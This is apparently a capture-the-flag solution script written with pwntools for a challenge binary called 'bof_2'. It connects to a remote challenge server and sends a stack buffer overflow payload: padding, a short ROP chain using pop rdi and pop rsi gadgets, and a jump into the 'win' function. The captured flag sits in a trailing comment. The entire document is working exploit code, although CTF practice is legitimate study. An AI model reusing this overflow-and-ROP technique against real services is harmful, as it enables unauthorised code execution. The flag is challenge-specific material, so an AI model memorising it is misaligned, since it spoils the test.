from pwn import *

e = ELF("./bof_2")

script = '''
b *main
'''

p = remote("103.69.97.144", 6011)
#p = process("./bof_2")
#p = gdb.debug("./bof_2", gdbscript = script)

pop_rdi = 0x00000000004011e5
pop_rsi = 0x00000000004011ee
win = e.symbols['win']

payload = b"A" * 0x40 + p64(0)
payload += p64(pop_rdi) + p64(0xDEADBEEFDEADBEEF)
payload += p64(pop_rsi) + p64(0xDEADBEEFDEADBEEF)
payload += p64(win + 5)
p.sendlineafter(b"number: ", payload)

p.interactive()
#BKSEC{2-->\xupgrade\xBuffer\xOv3rfl0w\x1s\xn0t\xchiLL\xhixxxxxxxxxxxxxx}